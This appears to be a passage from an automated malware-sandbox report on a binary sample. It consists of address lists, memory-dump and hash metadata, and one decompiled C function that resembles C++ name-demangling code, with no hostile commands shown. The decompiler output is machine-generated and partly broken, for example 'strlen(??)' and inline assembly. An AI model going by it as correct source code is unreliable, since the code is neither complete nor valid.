                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c7cb
                                                                                                                                                                                                                                                                                                        0x0040c7d3
                                                                                                                                                                                                                                                                                                        0x0040c687
                                                                                                                                                                                                                                                                                                        0x0040c68b
                                                                                                                                                                                                                                                                                                        0x0040c68e
                                                                                                                                                                                                                                                                                                        0x0040c694
                                                                                                                                                                                                                                                                                                        0x0040c6a0
                                                                                                                                                                                                                                                                                                        0x0040c6a3
                                                                                                                                                                                                                                                                                                        0x0040c6b9
                                                                                                                                                                                                                                                                                                        0x0040c880
                                                                                                                                                                                                                                                                                                        0x0040c885
                                                                                                                                                                                                                                                                                                        0x0040c88b
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c6c8
                                                                                                                                                                                                                                                                                                        0x0040c6cf
                                                                                                                                                                                                                                                                                                        0x0040c6d4
                                                                                                                                                                                                                                                                                                        0x0040c6da
                                                                                                                                                                                                                                                                                                        0x0040c6dd
                                                                                                                                                                                                                                                                                                        0x0040c6e3
                                                                                                                                                                                                                                                                                                        0x0040c6e8
                                                                                                                                                                                                                                                                                                        0x0040c6ee
                                                                                                                                                                                                                                                                                                        0x0040c6f0
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c734
                                                                                                                                                                                                                                                                                                        0x0040c740
                                                                                                                                                                                                                                                                                                        0x0040c74b
                                                                                                                                                                                                                                                                                                        0x0040c752
                                                                                                                                                                                                                                                                                                        0x0040c756
                                                                                                                                                                                                                                                                                                        0x0040c75d
                                                                                                                                                                                                                                                                                                        0x0040c766
                                                                                                                                                                                                                                                                                                        0x0040c76d
                                                                                                                                                                                                                                                                                                        0x0040c774
                                                                                                                                                                                                                                                                                                        0x0040c77b
                                                                                                                                                                                                                                                                                                        0x0040c780
                                                                                                                                                                                                                                                                                                        0x0040c787
                                                                                                                                                                                                                                                                                                        0x0040c78c
                                                                                                                                                                                                                                                                                                        0x0040c792
                                                                                                                                                                                                                                                                                                        0x0040c795
                                                                                                                                                                                                                                                                                                        0x0040c79d
                                                                                                                                                                                                                                                                                                        0x0040c7a1
                                                                                                                                                                                                                                                                                                        0x0040c7a5
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7b9
                                                                                                                                                                                                                                                                                                        0x0040c7b9
                                                                                                                                                                                                                                                                                                        0x0040c672
                                                                                                                                                                                                                                                                                                        0x0040c576
                                                                                                                                                                                                                                                                                                        0x0040c582
                                                                                                                                                                                                                                                                                                        0x0040c584
                                                                                                                                                                                                                                                                                                        0x0040c58a
                                                                                                                                                                                                                                                                                                        0x0040c58e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c590
                                                                                                                                                                                                                                                                                                        0x0040c596
                                                                                                                                                                                                                                                                                                        0x0040c5a0
                                                                                                                                                                                                                                                                                                        0x0040c5a0
                                                                                                                                                                                                                                                                                                        0x0040c5a6
                                                                                                                                                                                                                                                                                                        0x0040c5a6
                                                                                                                                                                                                                                                                                                        0x0040c5a9
                                                                                                                                                                                                                                                                                                        0x0040c5b1
                                                                                                                                                                                                                                                                                                        0x0040c5b1
                                                                                                                                                                                                                                                                                                        0x0040c5b7
                                                                                                                                                                                                                                                                                                        0x0040c7e8
                                                                                                                                                                                                                                                                                                        0x0040c7e8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c5b7
                                                                                                                                                                                                                                                                                                        0x0040c5ab
                                                                                                                                                                                                                                                                                                        0x0040c5af
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c700
                                                                                                                                                                                                                                                                                                        0x0040c702
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c708

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: strlen
                                                                                                                                                                                                                                                                                                        • String ID: Z$Z__$_$_$_GLOBAL_
                                                                                                                                                                                                                                                                                                        • API String ID: 39653677-4292778781
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5dfc0af7898a74114177fdc361a86ebfdee3aed8319054be729a6730491e01d0
                                                                                                                                                                                                                                                                                                        • Instruction ID: c40dabd319674bd2cc0e0cae16437056d9595a4bb6a0433c78e95727e65cb020
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5dfc0af7898a74114177fdc361a86ebfdee3aed8319054be729a6730491e01d0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C815D75D04269CBDB20DF29C8C43DABBF1AB45304F4482BAD449BB382D7399E858F95
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(0000007F), ref: 100014DB
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(0000007F), ref: 10001507
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 29cfafdec3d3a1262f4827b6cae24ea1b9a18653203c5f05ee1a645c7d2a8912
                                                                                                                                                                                                                                                                                                        • Instruction ID: 25e538b33cc42fa1af6dbc26f5ecb21efd633c51d41fb312bc782d6f26faee88
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29cfafdec3d3a1262f4827b6cae24ea1b9a18653203c5f05ee1a645c7d2a8912
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1871F874E04109EFEB08DF94C990AAEB7B2FF48345F248598E915AB345D735EE81CB90
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                                        			E0040C545(signed int __eax, intOrPtr __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                                                                                                                        				char _v60;
                                                                                                                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                                                                                                                        				char _v320;
                                                                                                                                                                                                                                                                                                        				char _v324;
                                                                                                                                                                                                                                                                                                        				char _v328;
                                                                                                                                                                                                                                                                                                        				char _v332;
                                                                                                                                                                                                                                                                                                        				signed int _v336;
                                                                                                                                                                                                                                                                                                        				char _v340;
                                                                                                                                                                                                                                                                                                        				char* _v344;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v348;
                                                                                                                                                                                                                                                                                                        				char _v352;
                                                                                                                                                                                                                                                                                                        				char* _v356;
                                                                                                                                                                                                                                                                                                        				signed char* _v360;
                                                                                                                                                                                                                                                                                                        				signed char _v364;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v368;
                                                                                                                                                                                                                                                                                                        				char _v372;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v384;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v388;
                                                                                                                                                                                                                                                                                                        				signed int _v392;
                                                                                                                                                                                                                                                                                                        				char _v400;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v404;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v408;
                                                                                                                                                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                                                                                                                                                        				signed int _t90;
                                                                                                                                                                                                                                                                                                        				void* _t96;
                                                                                                                                                                                                                                                                                                        				void* _t99;
                                                                                                                                                                                                                                                                                                        				signed int _t102;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t107;
                                                                                                                                                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                                                                                                                                                        				signed int _t124;
                                                                                                                                                                                                                                                                                                        				int _t125;
                                                                                                                                                                                                                                                                                                        				signed int _t128;
                                                                                                                                                                                                                                                                                                        				signed int _t129;
                                                                                                                                                                                                                                                                                                        				signed char* _t131;
                                                                                                                                                                                                                                                                                                        				char* _t133;
                                                                                                                                                                                                                                                                                                        				signed char* _t137;
                                                                                                                                                                                                                                                                                                        				signed char* _t138;
                                                                                                                                                                                                                                                                                                        				signed int _t142;
                                                                                                                                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                                                                                                                                        				signed int _t144;
                                                                                                                                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                                                                                                                                        				signed int _t147;
                                                                                                                                                                                                                                                                                                        				signed int _t149;
                                                                                                                                                                                                                                                                                                        				signed int _t150;
                                                                                                                                                                                                                                                                                                        				signed char* _t166;
                                                                                                                                                                                                                                                                                                        				void* _t168;
                                                                                                                                                                                                                                                                                                        				signed char* _t171;
                                                                                                                                                                                                                                                                                                        				void* _t176;
                                                                                                                                                                                                                                                                                                        				void* _t178;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t179;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t181;
                                                                                                                                                                                                                                                                                                        				void* _t183;
                                                                                                                                                                                                                                                                                                        				void* _t191;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t88 = __eax;
                                                                                                                                                                                                                                                                                                        				_t176 = _t178;
                                                                                                                                                                                                                                                                                                        				_t131 = __eax;
                                                                                                                                                                                                                                                                                                        				_t179 = _t178 - 0x18c;
                                                                                                                                                                                                                                                                                                        				_v384 = __edx;
                                                                                                                                                                                                                                                                                                        				_t149 =  *__eax & 0x000000ff;
                                                                                                                                                                                                                                                                                                        				_v388 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t183 = _t149 - 0x5f;
                                                                                                                                                                                                                                                                                                        				if(_t183 == 0) {
                                                                                                                                                                                                                                                                                                        					_t168 = 1;
                                                                                                                                                                                                                                                                                                        					if( *((char*)(__eax + 1)) != 0x5a) {
                                                                                                                                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                                                                                                                        					asm("repe cmpsb");
                                                                                                                                                                                                                                                                                                        					_t142 = 0 | _t183 > 0x00000000;
                                                                                                                                                                                                                                                                                                        					_t168 = 0;
                                                                                                                                                                                                                                                                                                        					if(_t142 != (_t88 & 0xffffff00 | _t183 > 0x00000000)) {
                                                                                                                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                                                                                                                        						 *_t179 = _t131;
                                                                                                                                                                                                                                                                                                        						_v392 = _t149;
                                                                                                                                                                                                                                                                                                        						_t90 = strlen(??);
                                                                                                                                                                                                                                                                                                        						_v372 = _t131;
                                                                                                                                                                                                                                                                                                        						_v364 = 0x11;
                                                                                                                                                                                                                                                                                                        						_v360 = _t131;
                                                                                                                                                                                                                                                                                                        						_v352 = 0;
                                                                                                                                                                                                                                                                                                        						_v340 = 0;
                                                                                                                                                                                                                                                                                                        						_t143 = _t90;
                                                                                                                                                                                                                                                                                                        						_v368 = _t131 + _t90;
                                                                                                                                                                                                                                                                                                        						_v348 = _t143 + _t143;
                                                                                                                                                                                                                                                                                                        						_v336 = _t143;
                                                                                                                                                                                                                                                                                                        						_v332 = 0;
                                                                                                                                                                                                                                                                                                        						_v328 = 0;
                                                                                                                                                                                                                                                                                                        						_v324 = 0;
                                                                                                                                                                                                                                                                                                        						_t96 = E0040DB20(0x00000012 + (_t143 + _t143 + _t143 * 0x00000004) * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        						_t99 = E0040DB20(0x00000012 + _t143 * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        						_t150 = _v392;
                                                                                                                                                                                                                                                                                                        						_t181 = _t179 - _t96 - _t99;
                                                                                                                                                                                                                                                                                                        						_t191 = _t168 - 1;
                                                                                                                                                                                                                                                                                                        						_v356 =  &_v400;
                                                                                                                                                                                                                                                                                                        						_v344 =  &_v400;
                                                                                                                                                                                                                                                                                                        						if(_t191 == 0) {
                                                                                                                                                                                                                                                                                                        							_t144 = 0;
                                                                                                                                                                                                                                                                                                        							if(_t150 == 0x5f) {
                                                                                                                                                                                                                                                                                                        								_t150 =  *(_t131 + 1) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        								_v360 = _t131 + 1;
                                                                                                                                                                                                                                                                                                        								if(_t150 != 0x5a) {
                                                                                                                                                                                                                                                                                                        									goto L21;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v360 = _t131 + 2;
                                                                                                                                                                                                                                                                                                        								_t135 =  &_v372;
                                                                                                                                                                                                                                                                                                        								_t144 = E00406810( &_v372, 1);
                                                                                                                                                                                                                                                                                                        								if((_v364 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                                                                                                                                        										_t171 = _v360;
                                                                                                                                                                                                                                                                                                        										_t150 =  *_t171 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        										if(_t150 != 0x2e) {
                                                                                                                                                                                                                                                                                                        											goto L21;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										_t112 = _t171[1] & 0x000000ff;
                                                                                                                                                                                                                                                                                                        										_t85 = _t112 - 0x61; // -7
                                                                                                                                                                                                                                                                                                        										if(_t85 <= 0x19 || _t112 == 0x5f || _t112 - 0x30 <= 9) {
                                                                                                                                                                                                                                                                                                        											_t144 = E00405190(_t135, _t144);
                                                                                                                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											_t150 =  *_t171 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        											goto L21;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									goto L21;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_t150 =  *_v360 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							L21:
                                                                                                                                                                                                                                                                                                        							_t102 = 0;
                                                                                                                                                                                                                                                                                                        							if(_t150 == 0 && _t144 != 0) {
                                                                                                                                                                                                                                                                                                        								_t133 =  &_v320;
                                                                                                                                                                                                                                                                                                        								_v64 = 0;
                                                                                                                                                                                                                                                                                                        								_v60 = 0;
                                                                                                                                                                                                                                                                                                        								_v48 = 0;
                                                                                                                                                                                                                                                                                                        								_v56 = _v384;
                                                                                                                                                                                                                                                                                                        								_v44 = 0;
                                                                                                                                                                                                                                                                                                        								_v36 = 0;
                                                                                                                                                                                                                                                                                                        								_v32 = 0;
                                                                                                                                                                                                                                                                                                        								_v52 = _v388;
                                                                                                                                                                                                                                                                                                        								_v40 = 0;
                                                                                                                                                                                                                                                                                                        								E004079F0(_t133, _t144, 0x11);
                                                                                                                                                                                                                                                                                                        								_t107 = _v64;
                                                                                                                                                                                                                                                                                                        								 *_t181 = _t133;
                                                                                                                                                                                                                                                                                                        								 *((char*)(_t176 + _t107 - 0x13c)) = 0;
                                                                                                                                                                                                                                                                                                        								_v404 = _v52;
                                                                                                                                                                                                                                                                                                        								_v408 = _t107;
                                                                                                                                                                                                                                                                                                        								_v56();
                                                                                                                                                                                                                                                                                                        								_t102 = 0 | _v40 == 0x00000000;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							return _t102;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(_t191 < 0 || _t168 > 3) {
                                                                                                                                                                                                                                                                                                        							_t144 = E00405ED0( &_v372);
                                                                                                                                                                                                                                                                                                        							_t150 =  *_v360 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t166 = _t131 + 0xb;
                                                                                                                                                                                                                                                                                                        							_v360 = _t166;
                                                                                                                                                                                                                                                                                                        							if( *((char*)(_t131 + 0xb)) != 0x5f ||  *((char*)(_t131 + 0xc)) != 0x5a) {
                                                                                                                                                                                                                                                                                                        								 *_t181 = _t166;
                                                                                                                                                                                                                                                                                                        								_t136 =  &_v372;
                                                                                                                                                                                                                                                                                                        								_t146 = E00404FF0( &_v372, strlen(??), _t166);
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_v360 = _t131 + 0xd;
                                                                                                                                                                                                                                                                                                        								_t136 =  &_v372;
                                                                                                                                                                                                                                                                                                        								_t146 = E00406810( &_v372, 0);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *_t181 = 0;
                                                                                                                                                                                                                                                                                                        							_t124 = E00404F90(_t136, _t146, (0 | _t168 != 0x00000002) + 0x42);
                                                                                                                                                                                                                                                                                                        							_t137 = _v360;
                                                                                                                                                                                                                                                                                                        							 *_t181 = _t137;
                                                                                                                                                                                                                                                                                                        							_v392 = _t124;
                                                                                                                                                                                                                                                                                                        							_t125 = strlen(??);
                                                                                                                                                                                                                                                                                                        							_t144 = _v392;
                                                                                                                                                                                                                                                                                                        							_t138 = _t137 + _t125;
                                                                                                                                                                                                                                                                                                        							_v360 = _t138;
                                                                                                                                                                                                                                                                                                        							_t150 =  *_t138 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t128 =  *(_t131 + 8) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					if(_t128 == 0x2e || _t128 == 0x5f) {
                                                                                                                                                                                                                                                                                                        						L5:
                                                                                                                                                                                                                                                                                                        						_t129 =  *(_t131 + 9) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						_t10 = _t129 == 0x49;
                                                                                                                                                                                                                                                                                                        						_t147 = _t142 & 0xffffff00 | _t10;
                                                                                                                                                                                                                                                                                                        						if(_t10 == 0) {
                                                                                                                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                                                                                                                        							_t168 = 0;
                                                                                                                                                                                                                                                                                                        							if( *((char*)(_t131 + 0xa)) == 0x5f) {
                                                                                                                                                                                                                                                                                                        								_t168 = (_t147 << 0x1f >> 0x1f) + 3;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t168 = 0;
                                                                                                                                                                                                                                                                                                        						if(_t129 != 0x44) {
                                                                                                                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						if(_t128 != 0x24) {
                                                                                                                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}
































































                                                                                                                                                                                                                                                                                                        0x0040c545
                                                                                                                                                                                                                                                                                                        0x0040c551
                                                                                                                                                                                                                                                                                                        0x0040c556
                                                                                                                                                                                                                                                                                                        0x0040c558
                                                                                                                                                                                                                                                                                                        0x0040c55e
                                                                                                                                                                                                                                                                                                        0x0040c564
                                                                                                                                                                                                                                                                                                        0x0040c567
                                                                                                                                                                                                                                                                                                        0x0040c56d
                                                                                                                                                                                                                                                                                                        0x0040c570
                                                                                                                                                                                                                                                                                                        0x0040c714
                                                                                                                                                                                                                                                                                                        0x0040c719
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c576
                                                                                                                                                                                                                                                                                                        0x0040c576
                                                                                                                                                                                                                                                                                                        0x0040c582
                                                                                                                                                                                                                                                                                                        0x0040c584
                                                                                                                                                                                                                                                                                                        0x0040c58a
                                                                                                                                                                                                                                                                                                        0x0040c58e
                                                                                                                                                                                                                                                                                                        0x0040c5c0
                                                                                                                                                                                                                                                                                                        0x0040c5c0
                                                                                                                                                                                                                                                                                                        0x0040c5c3
                                                                                                                                                                                                                                                                                                        0x0040c5c9
                                                                                                                                                                                                                                                                                                        0x0040c5ce
                                                                                                                                                                                                                                                                                                        0x0040c5d4
                                                                                                                                                                                                                                                                                                        0x0040c5de
                                                                                                                                                                                                                                                                                                        0x0040c5e4
                                                                                                                                                                                                                                                                                                        0x0040c5ee
                                                                                                                                                                                                                                                                                                        0x0040c5f8
                                                                                                                                                                                                                                                                                                        0x0040c5fd
                                                                                                                                                                                                                                                                                                        0x0040c606
                                                                                                                                                                                                                                                                                                        0x0040c619
                                                                                                                                                                                                                                                                                                        0x0040c61f
                                                                                                                                                                                                                                                                                                        0x0040c629
                                                                                                                                                                                                                                                                                                        0x0040c633
                                                                                                                                                                                                                                                                                                        0x0040c63d
                                                                                                                                                                                                                                                                                                        0x0040c652
                                                                                                                                                                                                                                                                                                        0x0040c657
                                                                                                                                                                                                                                                                                                        0x0040c65d
                                                                                                                                                                                                                                                                                                        0x0040c65f
                                                                                                                                                                                                                                                                                                        0x0040c666
                                                                                                                                                                                                                                                                                                        0x0040c66c
                                                                                                                                                                                                                                                                                                        0x0040c672
                                                                                                                                                                                                                                                                                                        0x0040c725
                                                                                                                                                                                                                                                                                                        0x0040c72a
                                                                                                                                                                                                                                                                                                        0x0040c7f0
                                                                                                                                                                                                                                                                                                        0x0040c7f7
                                                                                                                                                                                                                                                                                                        0x0040c800
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c80e
                                                                                                                                                                                                                                                                                                        0x0040c814
                                                                                                                                                                                                                                                                                                        0x0040c828
                                                                                                                                                                                                                                                                                                        0x0040c82a
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c851
                                                                                                                                                                                                                                                                                                        0x0040c857
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c85d
                                                                                                                                                                                                                                                                                                        0x0040c861
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x0040c849
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c734
                                                                                                                                                                                                                                                                                                        0x0040c740
                                                                                                                                                                                                                                                                                                        0x0040c74b
                                                                                                                                                                                                                                                                                                        0x0040c752
                                                                                                                                                                                                                                                                                                        0x0040c756
                                                                                                                                                                                                                                                                                                        0x0040c75d
                                                                                                                                                                                                                                                                                                        0x0040c766
                                                                                                                                                                                                                                                                                                        0x0040c76d
                                                                                                                                                                                                                                                                                                        0x0040c774
                                                                                                                                                                                                                                                                                                        0x0040c77b
                                                                                                                                                                                                                                                                                                        0x0040c780
                                                                                                                                                                                                                                                                                                        0x0040c787
                                                                                                                                                                                                                                                                                                        0x0040c78c
                                                                                                                                                                                                                                                                                                        0x0040c792
                                                                                                                                                                                                                                                                                                        0x0040c795
                                                                                                                                                                                                                                                                                                        0x0040c79d
                                                                                                                                                                                                                                                                                                        0x0040c7a1
                                                                                                                                                                                                                                                                                                        0x0040c7a5
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7b9
                                                                                                                                                                                                                                                                                                        0x0040c7b9
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c7cb
                                                                                                                                                                                                                                                                                                        0x0040c7d3
                                                                                                                                                                                                                                                                                                        0x0040c687
                                                                                                                                                                                                                                                                                                        0x0040c68b
                                                                                                                                                                                                                                                                                                        0x0040c68e
                                                                                                                                                                                                                                                                                                        0x0040c694
                                                                                                                                                                                                                                                                                                        0x0040c6a0
                                                                                                                                                                                                                                                                                                        0x0040c6a3
                                                                                                                                                                                                                                                                                                        0x0040c6b9
                                                                                                                                                                                                                                                                                                        0x0040c880
                                                                                                                                                                                                                                                                                                        0x0040c885
                                                                                                                                                                                                                                                                                                        0x0040c88b
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c6c8
                                                                                                                                                                                                                                                                                                        0x0040c6cf
                                                                                                                                                                                                                                                                                                        0x0040c6d4
                                                                                                                                                                                                                                                                                                        0x0040c6da
                                                                                                                                                                                                                                                                                                        0x0040c6dd
                                                                                                                                                                                                                                                                                                        0x0040c6e3
                                                                                                                                                                                                                                                                                                        0x0040c6e8
                                                                                                                                                                                                                                                                                                        0x0040c6ee
                                                                                                                                                                                                                                                                                                        0x0040c6f0
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c590
                                                                                                                                                                                                                                                                                                        0x0040c596
                                                                                                                                                                                                                                                                                                        0x0040c5a0
                                                                                                                                                                                                                                                                                                        0x0040c5a0
                                                                                                                                                                                                                                                                                                        0x0040c5a6
                                                                                                                                                                                                                                                                                                        0x0040c5a6
                                                                                                                                                                                                                                                                                                        0x0040c5a9
                                                                                                                                                                                                                                                                                                        0x0040c5b1
                                                                                                                                                                                                                                                                                                        0x0040c5b1
